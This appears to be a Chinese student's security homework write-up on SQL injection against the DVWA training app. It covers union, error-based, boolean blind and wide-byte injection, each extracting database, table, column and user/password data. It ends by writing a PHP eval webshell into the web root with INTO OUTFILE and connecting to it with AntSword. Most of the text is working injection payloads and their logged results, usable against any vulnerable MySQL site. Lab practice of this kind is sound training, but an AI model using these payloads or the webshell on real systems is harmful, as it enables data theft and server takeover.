当前位置: 首页 > news >正文

第七周作业

news 来源:原创 2025/4/20 5:28:38

一、分别在前端和后端使用联合注入实现“库名-表名-字段名-数据”的注入过程,写清楚注入步骤

 1、爆库

后端sql语句:select database();	前端:1' order by 1#,1' order by 2#,1' order by 3#	判断显示位为两位1' union select database(),1#	查询出数据库名---dvwa

2、爆表--dvwa数据库

后端sql语句:select table_name from information_schema.tables where table_schema = database();	前端:1' union select table_name,1 from information_schema.tables where table_schema = database()#	查询出dvwa数据库中有哪些表--guestbook,users

3、爆字段名--dvwa数据库users表

后端sql语句:select column_name from information_schema.columns where table_schema = database() and table_name = 'users';前端:1' union select column_name,1 from information_schema.columns where table_schema = database() and table_name = 'users	dvwa数据库users表中的字段名--user_id,first_name,last_name,user,password,avatar,last_login,failed_login

4、数据

后端sql语句:select user,password from users;前端:1' union select user,password from users#

二、分别在前端和后端使用报错注入实现“库名-表名-字段名-数据”的注入过程,写清楚注入步骤。 

1、爆库

后端sql语句:select extractvalue(1,concat(0x7e,database()));前端:1' and extractvalue(1,concat(0x7e,database()))#

2、爆表--dvwa数据库

1)dvwa数据库中的数据表的个数后端sql语句:select count(table_name) from information_schema.tables where table_schema = database(); select extractvalue(1,concat(0x7e,(select count(table_name) from information_schema.tables where table_schema = database())));前端:1' and extractvalue(1,concat(0x7e,(select count(table_name) from information_schema.tables where table_schema = database())))#2)dvwa数据库的数据表名----guestbook,usersselect table_name from information_schema.tables where table_schema = database() limit 0,1;select extractvalue(1,concat(0x7e,(select table_name from information_schema.tables where table_schema = database() limit 0,1)));select extractvalue(1,concat(0x7e,(select table_name from information_schema.tables where table_schema = database() limit 1,1)));前端:1' and extractvalue(1,concat(0x7e,(select table_name from information_schema.tables where table_schema = database() limit 0,1)))#1' and extractvalue(1,concat(0x7e,(select table_name from information_schema.tables where table_schema = database() limit 1,1)))#

3、爆字段名--dvwa数据库users表

1)字段个数---8个select count(column_name) from information_schema.columns where table_schema = database() and table_name = 'users';后端sql语句:select extractvalue(1,concat(0x7e,(select count(column_name) from information_schema.columns where table_schema = database() and table_name = 'users')));前端:1' and  extractvalue(1,concat(0x7e,(select count(column_name) from information_schema.columns where table_schema = database() and table_name = 'users')))#2)字段名--user和password后端sql语句:select extractvalue(1,concat(0x7e,(select column_name from information_schema.columns where table_schema = database() and table_name = 'users' limit 0,1)));前端:1' and extractvalue(1,concat(0x7e,(select column_name from information_schema.columns where table_schema = database() and table_name = 'users' limit 0,1)))#

4、数据--dvwa数据库users表user和password的值

后端sql语句:select extractvalue(1,concat(0x7e,(select user from users where user_id = 1)));select extractvalue(1,concat(0x7e,(select password from users where user_id = 1)));前端:1' and extractvalue(1,concat(0x7e,(select user from users where user_id = 1)))#1' and extractvalue(1,concat(0x7e,(select password from users where user_id = 1)))#

5、回答下列关于报错注入的问题:

(1)在extractvalue函数中,为什么'~'写在参数1的位置不报错,而写在参数2的位置报错?

因为extractvalue(XML_document,xpath_string)的第一个参数是string格式,代表XML文档对象的名称,是可以有'~'的,它的第二个参数虽然也是string格式,但第二个参数需满足xpath语法格式 ,代表XML文档的路径,而路径的字符串表示中是不可能有'~'的,所以'~'写在参数1的位置不报错,而写在参数2的位置会报错

(2)报错注入中,为什么要突破单引号的限制,如何突破?

突破单引号的限制是为了让‘and’逃逸出来,使‘and’在sql语句中的语义生效

按照sql语句的语法格式,在 and前面加一个单引号,使其在后端的sql语句中和前面的单引号进行闭合,在最后加一个#,表示截断注释,让后端的sql语句中最后的单引号失效,从而实现and的逃逸

(3)在报错注入过程中,为什么要进行报错,是哪种类型的报错?

当extractvalue函数的第二个参数不符合文档路径的语法,比如,出现'~'、'?'、'<'等文件路径名禁用的字符就会报错,这属于函数参数语法报错

三、任选布尔盲注或者时间盲注在前端和后端实现“库名-表名”的注入过程,写清楚注入步骤

1、猜解数据库名的长度--利用二分法

sql语句:select length(database())1' and length(database()) > 10 #	missing
1' and length(database()) > 5 #		missing
1' and length(database()) > 3 #		exists
1' and length(database()) = 4 #		exists
1' and length(database()) = 5 #		missing数据库名的长度为4

2、猜解数据库名

sql语句:select ascii(substr(database(),1,1))1' and ascii(substr(database(),1,1)) > 126 #	missing
1' and ascii(substr(database(),1,1)) > 64 #		exists
1' and ascii(substr(database(),1,1)) > 96 #		exists
1' and ascii(substr(database(),1,1)) > 111 #	missing
1' and ascii(substr(database(),1,1)) > 103 #	missing
1' and ascii(substr(database(),1,1)) > 97 #		exists
1' and ascii(substr(database(),1,1)) > 100 #	missing
1' and ascii(substr(database(),1,1)) = 98 #		missing
1' and ascii(substr(database(),1,1)) = 99 #		missing
1' and ascii(substr(database(),1,1)) = 100 #	exists
数据库名第一个字符的ascii码为100,对应的字符为d1' and ascii(substr(database(),2,1)) > 126 #	missing
1' and ascii(substr(database(),2,1)) > 64 #		exists
1' and ascii(substr(database(),2,1)) > 98 #		exists
1' and ascii(substr(database(),2,1)) > 110 #	exists
1' and ascii(substr(database(),2,1)) > 118 #	missing
1' and ascii(substr(database(),2,1)) > 114 #	exists
1' and ascii(substr(database(),2,1)) > 116 #	exists
1' and ascii(substr(database(),2,1)) = 117 #	missing
1' and ascii(substr(database(),2,1)) = 118 #	exists
数据库名第二个字符的ascii码为118,对应的字符为v1' and ascii(substr(database(),3,1)) > 126 #	m
1' and ascii(substr(database(),3,1)) >64 #		e
1' and ascii(substr(database(),3,1)) >96 #		e
1' and ascii(substr(database(),3,1)) >110 #		e
1' and ascii(substr(database(),3,1)) >118 #		e
1' and ascii(substr(database(),3,1)) >122 #		m
1' and ascii(substr(database(),3,1)) >120 #		m
1' and ascii(substr(database(),3,1)) =119 #		e
数据库名第三个字符的ascii码为119,对应的字符为w1' and ascii(substr(database(),4,1)) > 64 #		e
1' and ascii(substr(database(),4,1)) > 96 #		e
1' and ascii(substr(database(),4,1)) > 111 #	m
1' and ascii(substr(database(),4,1)) > 103 #	m
1' and ascii(substr(database(),4,1)) > 100 #	m
1' and ascii(substr(database(),4,1)) > 98 #		m
1' and ascii(substr(database(),4,1)) =97 #		e
数据库名第四个字符的ascii码为97,对应的字符为a数据库名为:dvwa

3、猜解dvwa数据库中的数据表的个数

sql语句:select count(table_name) from information_schema.tables where table_schema = database()1' and (select count(table_name) from information_schema.tables where table_schema = database()) > 10#	m
1' and (select count(table_name) from information_schema.tables where table_schema = database()) > 5#	m
1' and (select count(table_name) from information_schema.tables where table_schema = database()) > 3#	m
1' and (select count(table_name) from information_schema.tables where table_schema = database()) > 1#	e
1' and (select count(table_name) from information_schema.tables where table_schema = database()) =2#	edvwa数据库中的数据表的个数为:2

4、猜解dvea数据库中的数据表名

第一张表:

1)猜解第一张表的长度
sql语句:select length(table_name) from information_schema.tables where table_schema = database() limit 0,11' and (select length(table_name) from information_schema.tables where table_schema = database() limit 0,1)>10#		m
1' and (select length(table_name) from information_schema.tables where table_schema = database() limit 0,1)>5#		e
1' and (select length(table_name) from information_schema.tables where table_schema = database() limit 0,1)>8#		e
1' and (select length(table_name) from information_schema.tables where table_schema = database() limit 0,1)=9#		e
第一张表的长度为:92)猜解第一张表的名称
sql语句:select ascii(substr(table_name,1,1)) from information_schema.tables where table_schema = 'dvwa' limit 0,11' and (select ascii(substr(table_name,1,1)) from information_schema.tables where table_schema = 'dvwa' limit 0,1) > 64#	e
1' and (select ascii(substr(table_name,1,1)) from information_schema.tables where table_schema = 'dvwa' limit 0,1) > 98#	e
1' and (select ascii(substr(table_name,1,1)) from information_schema.tables where table_schema = 'dvwa' limit 0,1) > 112#	m
1' and (select ascii(substr(table_name,1,1)) from information_schema.tables where table_schema = 'dvwa' limit 0,1) > 105#	m
1' and (select ascii(substr(table_name,1,1)) from information_schema.tables where table_schema = 'dvwa' limit 0,1) > 102#	e
1' and (select ascii(substr(table_name,1,1)) from information_schema.tables where table_schema = 'dvwa' limit 0,1) > 104#	m
1' and (select ascii(substr(table_name,1,1)) from information_schema.tables where table_schema = 'dvwa' limit 0,1) =103#	e
第一张表的第一个字符的ascii码为103,对应的字符为:g1' and (select ascii(substr(table_name,2,1)) from information_schema.tables where table_schema = 'dvwa' limit 0,1) >64#		e
1' and (select ascii(substr(table_name,2,1)) from information_schema.tables where table_schema = 'dvwa' limit 0,1) >98#		e
1' and (select ascii(substr(table_name,2,1)) from information_schema.tables where table_schema = 'dvwa' limit 0,1) >112#	e
1' and (select ascii(substr(table_name,2,1)) from information_schema.tables where table_schema = 'dvwa' limit 0,1) >120#	m
1' and (select ascii(substr(table_name,2,1)) from information_schema.tables where table_schema = 'dvwa' limit 0,1) >116#	e
1' and (select ascii(substr(table_name,2,1)) from information_schema.tables where table_schema = 'dvwa' limit 0,1) >118#	m
1' and (select ascii(substr(table_name,2,1)) from information_schema.tables where table_schema = 'dvwa' limit 0,1) =117#	e
第一张表的第二个字符的ascii码为117,对应的字符为:u1' and (select ascii(substr(table_name,3,1)) from information_schema.tables where table_schema = 'dvwa' limit 0,1) >64#		e
1' and (select ascii(substr(table_name,3,1)) from information_schema.tables where table_schema = 'dvwa' limit 0,1) >98#		e
1' and (select ascii(substr(table_name,3,1)) from information_schema.tables where table_schema = 'dvwa' limit 0,1) >112#	m
1' and (select ascii(substr(table_name,3,1)) from information_schema.tables where table_schema = 'dvwa' limit 0,1) >105#	m
1' and (select ascii(substr(table_name,3,1)) from information_schema.tables where table_schema = 'dvwa' limit 0,1) >102#	m
1' and (select ascii(substr(table_name,3,1)) from information_schema.tables where table_schema = 'dvwa' limit 0,1) >100#	e
1' and (select ascii(substr(table_name,3,1)) from information_schema.tables where table_schema = 'dvwa' limit 0,1) =101#	e
第一张表的第三个字符的ascii码为101,对就的字符为:e1' and (select ascii(substr(table_name,4,1)) from information_schema.tables where table_schema = 'dvwa' limit 0,1) >64#		e
1' and (select ascii(substr(table_name,4,1)) from information_schema.tables where table_schema = 'dvwa' limit 0,1) >98#		e
1' and (select ascii(substr(table_name,4,1)) from information_schema.tables where table_schema = 'dvwa' limit 0,1) >112#	e
1' and (select ascii(substr(table_name,4,1)) from information_schema.tables where table_schema = 'dvwa' limit 0,1) >119#	m
1' and (select ascii(substr(table_name,4,1)) from information_schema.tables where table_schema = 'dvwa' limit 0,1) >116#	m
1' and (select ascii(substr(table_name,4,1)) from information_schema.tables where table_schema = 'dvwa' limit 0,1) >114#	e
1' and (select ascii(substr(table_name,4,1)) from information_schema.tables where table_schema = 'dvwa' limit 0,1) =115#	e
第一张表的第四个字符的ascii码为115,对应的字符为:s1' and (select ascii(substr(table_name,5,1)) from information_schema.tables where table_schema = 'dvwa' limit 0,1) >64#		e
1' and (select ascii(substr(table_name,5,1)) from information_schema.tables where table_schema = 'dvwa' limit 0,1) >98#		e
1' and (select ascii(substr(table_name,5,1)) from information_schema.tables where table_schema = 'dvwa' limit 0,1) >112#	e
1' and (select ascii(substr(table_name,5,1)) from information_schema.tables where table_schema = 'dvwa' limit 0,1) >120#	m
1' and (select ascii(substr(table_name,5,1)) from information_schema.tables where table_schema = 'dvwa' limit 0,1) >116#	m
1' and (select ascii(substr(table_name,5,1)) from information_schema.tables where table_schema = 'dvwa' limit 0,1) >114#	e
1' and (select ascii(substr(table_name,5,1)) from information_schema.tables where table_schema = 'dvwa' limit 0,1) =115#	m
1' and (select ascii(substr(table_name,5,1)) from information_schema.tables where table_schema = 'dvwa' limit 0,1) =116#	e
第一张表的第五个字符的ascii码为116,对应的字符为:t1' and (select ascii(substr(table_name,6,1)) from information_schema.tables where table_schema = 'dvwa' limit 0,1) >64#		e
1' and (select ascii(substr(table_name,6,1)) from information_schema.tables where table_schema = 'dvwa' limit 0,1) >98#		m
1' and (select ascii(substr(table_name,6,1)) from information_schema.tables where table_schema = 'dvwa' limit 0,1) >81#		e
1' and (select ascii(substr(table_name,6,1)) from information_schema.tables where table_schema = 'dvwa' limit 0,1) >89#		e
1' and (select ascii(substr(table_name,6,1)) from information_schema.tables where table_schema = 'dvwa' limit 0,1) >94#		e
1' and (select ascii(substr(table_name,6,1)) from information_schema.tables where table_schema = 'dvwa' limit 0,1) >96#		e
1' and (select ascii(substr(table_name,6,1)) from information_schema.tables where table_schema = 'dvwa' limit 0,1) =97#		m
1' and (select ascii(substr(table_name,6,1)) from information_schema.tables where table_schema = 'dvwa' limit 0,1) =98#		e
第一张表的第六个字符的ascii码为98,对应的字符为:b1' and (select ascii(substr(table_name,7,1)) from information_schema.tables where table_schema = 'dvwa' limit 0,1) >64#		e
1' and (select ascii(substr(table_name,7,1)) from information_schema.tables where table_schema = 'dvwa' limit 0,1) >98#		e
1' and (select ascii(substr(table_name,7,1)) from information_schema.tables where table_schema = 'dvwa' limit 0,1) >112#	m
1' and (select ascii(substr(table_name,7,1)) from information_schema.tables where table_schema = 'dvwa' limit 0,1) >105#	e
1' and (select ascii(substr(table_name,7,1)) from information_schema.tables where table_schema = 'dvwa' limit 0,1) >109#	e
1' and (select ascii(substr(table_name,7,1)) from information_schema.tables where table_schema = 'dvwa' limit 0,1) =110#	m
1' and (select ascii(substr(table_name,7,1)) from information_schema.tables where table_schema = 'dvwa' limit 0,1) =111#	e
第一张表的第七个字符的ascii码为111,对应的字符为:o1' and (select ascii(substr(table_name,8,1)) from information_schema.tables where table_schema = 'dvwa' limit 0,1) >64#		e
1' and (select ascii(substr(table_name,8,1)) from information_schema.tables where table_schema = 'dvwa' limit 0,1) >98#		e
1' and (select ascii(substr(table_name,8,1)) from information_schema.tables where table_schema = 'dvwa' limit 0,1) >112#	m
1' and (select ascii(substr(table_name,8,1)) from information_schema.tables where table_schema = 'dvwa' limit 0,1) >105#	e
1' and (select ascii(substr(table_name,8,1)) from information_schema.tables where table_schema = 'dvwa' limit 0,1) >109#	e
1' and (select ascii(substr(table_name,8,1)) from information_schema.tables where table_schema = 'dvwa' limit 0,1) =110#	m
1' and (select ascii(substr(table_name,8,1)) from information_schema.tables where table_schema = 'dvwa' limit 0,1) =111#	e
第一张表的第八个字符的ascii码为111,对应的字符为:o1' and (select ascii(substr(table_name,9,1)) from information_schema.tables where table_schema = 'dvwa' limit 0,1) >64#		e
1' and (select ascii(substr(table_name,9,1)) from information_schema.tables where table_schema = 'dvwa' limit 0,1) >98#		e
1' and (select ascii(substr(table_name,9,1)) from information_schema.tables where table_schema = 'dvwa' limit 0,1) >112#	m
1' and (select ascii(substr(table_name,9,1)) from information_schema.tables where table_schema = 'dvwa' limit 0,1) >105#	e
1' and (select ascii(substr(table_name,9,1)) from information_schema.tables where table_schema = 'dvwa' limit 0,1) >109#	m
1' and (select ascii(substr(table_name,9,1)) from information_schema.tables where table_schema = 'dvwa' limit 0,1) >107#	m
1' and (select ascii(substr(table_name,9,1)) from information_schema.tables where table_schema = 'dvwa' limit 0,1) =106#	m
1' and (select ascii(substr(table_name,9,1)) from information_schema.tables where table_schema = 'dvwa' limit 0,1) =107#	e
第一张表的第九个字符的ascii码为107,对就的字符为:k

dvwa数据库第一张表的名称为:guestbook

第二张表:

1)猜解dvwa数据库第二张表的长度
sql语句:select length(table_name) from information_schema.tables where table_schema = database() limit 1,11' and (select length(table_name) from information_schema.tables where table_schema = database() limit 1,1)>10#		m
1' and (select length(table_name) from information_schema.tables where table_schema = database() limit 1,1)>5#		m
1' and (select length(table_name) from information_schema.tables where table_schema = database() limit 1,1)>3#		e
1' and (select length(table_name) from information_schema.tables where table_schema = database() limit 1,1)=4#		m
1' and (select length(table_name) from information_schema.tables where table_schema = database() limit 1,1)=5#		e
dvwa数据库第二张表的长度为:52)猜解dvwa数据库第二张表的名称
sql语句:select ascii(substr(table_name,1,1)) from information_schema.tables where table_schema = database() limit 1,11' and (select ascii(substr(table_name,1,1)) from information_schema.tables where table_schema = database() limit 1,1) > 64#	e
1' and (select ascii(substr(table_name,1,1)) from information_schema.tables where table_schema = database() limit 1,1) > 98#	e	
1' and (select ascii(substr(table_name,1,1)) from information_schema.tables where table_schema = database() limit 1,1) > 112#	e
1' and (select ascii(substr(table_name,1,1)) from information_schema.tables where table_schema = database() limit 1,1) > 119#	m
1' and (select ascii(substr(table_name,1,1)) from information_schema.tables where table_schema = database() limit 1,1) > 116#	e
1' and (select ascii(substr(table_name,1,1)) from information_schema.tables where table_schema = database() limit 1,1) =117#	e
第二张表的第一个字符的ascii码为:117,对应的字符为:u1' and (select ascii(substr(table_name,2,1)) from information_schema.tables where table_schema = database() limit 1,1) >64#		e
1' and (select ascii(substr(table_name,2,1)) from information_schema.tables where table_schema = database() limit 1,1) >98#		e
1' and (select ascii(substr(table_name,2,1)) from information_schema.tables where table_schema = database() limit 1,1) >112#	e
1' and (select ascii(substr(table_name,2,1)) from information_schema.tables where table_schema = database() limit 1,1) >119#	m
1' and (select ascii(substr(table_name,2,1)) from information_schema.tables where table_schema = database() limit 1,1) >116#	m
1' and (select ascii(substr(table_name,2,1)) from information_schema.tables where table_schema = database() limit 1,1) >114#	e
1' and (select ascii(substr(table_name,2,1)) from information_schema.tables where table_schema = database() limit 1,1) =115#	e
第二张表的第二个字符的ascii码为:115,对应的字符为:s1' and (select ascii(substr(table_name,3,1)) from information_schema.tables where table_schema = database() limit 1,1) >64#		e
1' and (select ascii(substr(table_name,3,1)) from information_schema.tables where table_schema = database() limit 1,1) >98#		e
1' and (select ascii(substr(table_name,3,1)) from information_schema.tables where table_schema = database() limit 1,1) >112#	m
1' and (select ascii(substr(table_name,3,1)) from information_schema.tables where table_schema = database() limit 1,1) >105#	m
1' and (select ascii(substr(table_name,3,1)) from information_schema.tables where table_schema = database() limit 1,1) >102#	m
1' and (select ascii(substr(table_name,3,1)) from information_schema.tables where table_schema = database() limit 1,1) >100#	e
1' and (select ascii(substr(table_name,3,1)) from information_schema.tables where table_schema = database() limit 1,1) =101#	e
第二张表的第三个字符的ascii码为:101,对应的字符为:e1' and (select ascii(substr(table_name,4,1)) from information_schema.tables where table_schema = database() limit 1,1) >64#		e
1' and (select ascii(substr(table_name,4,1)) from information_schema.tables where table_schema = database() limit 1,1) >98#		e
1' and (select ascii(substr(table_name,4,1)) from information_schema.tables where table_schema = database() limit 1,1) >112#	e
1' and (select ascii(substr(table_name,4,1)) from information_schema.tables where table_schema = database() limit 1,1) >119#	m
1' and (select ascii(substr(table_name,4,1)) from information_schema.tables where table_schema = database() limit 1,1) >116#	m
1' and (select ascii(substr(table_name,4,1)) from information_schema.tables where table_schema = database() limit 1,1) >114#	m
1' and (select ascii(substr(table_name,4,1)) from information_schema.tables where table_schema = database() limit 1,1) =113#	m
1' and (select ascii(substr(table_name,4,1)) from information_schema.tables where table_schema = database() limit 1,1) =114#	e
第二张表的第四个字符的ascii码为:114,对应的字符为:r1' and (select ascii(substr(table_name,2,1)) from information_schema.tables where table_schema = database() limit 1,1) >64#		e
1' and (select ascii(substr(table_name,2,1)) from information_schema.tables where table_schema = database() limit 1,1) >98#		e
1' and (select ascii(substr(table_name,2,1)) from information_schema.tables where table_schema = database() limit 1,1) >112#	e
1' and (select ascii(substr(table_name,2,1)) from information_schema.tables where table_schema = database() limit 1,1) >119#	m
1' and (select ascii(substr(table_name,2,1)) from information_schema.tables where table_schema = database() limit 1,1) >116#	m
1' and (select ascii(substr(table_name,2,1)) from information_schema.tables where table_schema = database() limit 1,1) >114#	e
1' and (select ascii(substr(table_name,2,1)) from information_schema.tables where table_schema = database() limit 1,1) =115#	e
第二张表的第五个字符的ascii码为:115,对应的字符为:s

dvwa数据库的第二张表的名称为:users

5、猜解dvwa数据库users表的字段数

sql语句:select count(column_name) from information_schema.columns where table_schema = database() and table_name = 'users'1' and (select count(column_name) from information_schema.columns where table_schema = database() and table_name = 'users') > 10#	m
1' and (select count(column_name) from information_schema.columns where table_schema = database() and table_name = 'users') > 5#	e
1' and (select count(column_name) from information_schema.columns where table_schema = database() and table_name = 'users') > 8#	m
1' and (select count(column_name) from information_schema.columns where table_schema = database() and table_name = 'users') > 7#	e
1' and (select count(column_name) from information_schema.columns where table_schema = database() and table_name = 'users') =8#		e
dvwa数据库的users表中的字段数为:8

6、猜解dvwa数据库users表的字段名称

获取几个包含关键信息的字段,如:用户名、密码...

【猜想】数据库中可能保存的字段名称

用户名:username/user_name/uname/u_name/user/name/...

密码:password/pass_word/pwd/pass/...

sql语句:select count(*) from information_schema.columns where table_schema = database() and table_name = 'users' and column_name = 'username'1' and (select count(*) from information_schema.columns where table_schema = database() and table_name = 'users' and column_name = 'username') = 1#		m
1' and (select count(*) from information_schema.columns where table_schema = database() and table_name = 'users' and column_name = 'user') = 1#			e
猜解出users表中的1个字段名为:user1' and (select count(*) from information_schema.columns where table_schema = database() and table_name = 'users' and column_name = 'password') = 1#		e
猜解出users表中的1个字段名为:password

dvwa数据库users表中的两个字段名为:user,password

7、猜解users表中user和password的字段值

user字段的字段值

1)user字段的值的个数----5个
sql语句:select count(user) from users1' and (select count(user) from users) >10#		m
1' and (select count(user) from users) >5#		m
1' and (select count(user) from users) >3#		e
........2)猜解user字段第一个字段值的长度----5
sql语句:select length(user) from users limit 0,11' and (select length(user) from users limit 0,1) > 10#		m
.......3)猜解user字段第一个字段值---admin
sql语句:select ascii(substr(user,1,1)) from users limit 0,1;1' and (select ascii(substr(user,1,1)) from users limit 0,1) > 64 # 	e
1' and (select ascii(substr(user,1,1)) from users limit 0,1) > 98 #		m
1' and (select ascii(substr(user,1,1)) from users limit 0,1) > 88 #		e
1' and (select ascii(substr(user,1,1)) from users limit 0,1) > 94 #		e
1' and (select ascii(substr(user,1,1)) from users limit 0,1) > 96 #		e
1' and (select ascii(substr(user,1,1)) from users limit 0,1) = 97 #		e
user第一个字段的值为:a........
user第二个字段的值为:d
user第三个字段的值为:m
user第四个字段的值为:i
user第五个字段的值为:n4)猜user字段第二/三/四/五个字段值
。。。。。。

password字段的字段值

同猜解user字段的字段值

四、利用宽字节注入实现“库名-表名”的注入过程,写清楚注入步骤

1、爆库

lili%df' union select database(),version()#

2、爆表

sql语句:select table_name from information_schema.tables where table_schema = database()lili%df' union select 1,table_name from information_schema.tables where table_schema = database()#

 

3、爆字段--users表

4、下载数据--users表中的username和password

sql语句:select username,password from userslili%df' union select username,password from users#

五、利用SQL注入实现DVWA站点的Getshell,写清楚攻击步骤 

#使用into outfile 写入一句话木马,文件名为shell2.php1' union select 1,"<?php eval($_POST['a']);?>" into outfile '/var/www/html/shell2.php' #

 使用蚁剑工具连接

使用Hackbar来连接shell2.php

 

相关文章:

  • Neovim插件深度解析:mcphub.nvim如何用MCP协议重构开发体验
  • 数字孪生赋能管理系统,降本增效立竿见影
  • Manus技术架构、实现内幕及分布式智能体项目实战
  • 海量聊天数据处理:基于Spring Boot与SharingJDBC的分库分表策略及ClickHouse冷热数据分离
  • 微服务与事件驱动架构(EDA)
  • 每天五分钟深度学习PyTorch:0填充函数在搭建神经网络中的应用
  • 13.第二阶段x64游戏实战-分析人物等级和升级经验
  • Cocos Creater打包安卓App添加隐私弹窗详细步骤+常见问题处理
  • android测试依赖
  • 【论文阅读21】-PSOSVM-CNN-GRU-Attention-滑坡预测(2024-12)
  • ubuntu24.04上使用qemu+buildroot+uboot+linux+tftp+nfs模拟搭建vexpress-ca9嵌入式linux开发环境
  • FFMPEG-视频解码-支持rtsp|rtmp|音视频文件(低延迟)
  • 【Hot100】 73. 矩阵置零
  • Graham Scan算法求解二维凸包
  • 2024年网站开发语言选择指南:PHP/Java/Node.js/Python如何选型?
  • 从UDS协议学习ISO网络七层架构:汽车诊断网络协议的分层逻辑剖析
  • wordpress SMTP配置qq邮箱发送邮件,新版QQ邮箱授权码获取方法
  • WPF 点击按钮,显示隐藏另一个控件
  • MCP 应用案例-网络设备批量管理
  • Git 版本控制工具
  • 五一出境游火爆:境外包车订单增长25%,日本酒店价格贵了好几倍
  • 长安汽车辟谣抛弃华为,重奖百万征集扩散不实内容的背后组织
  • 拒绝“假期刺客”,澎湃启动“五一”消费维权线索征集
  • 马上评丨黄仁勋到访中国,一个重要节点和一句大实话
  • 工信部:计划出台机械、汽车、电力装备等三个行业新一轮稳增长工作方案
  • 红十字国际委员会加沙地带办公场所再次遭袭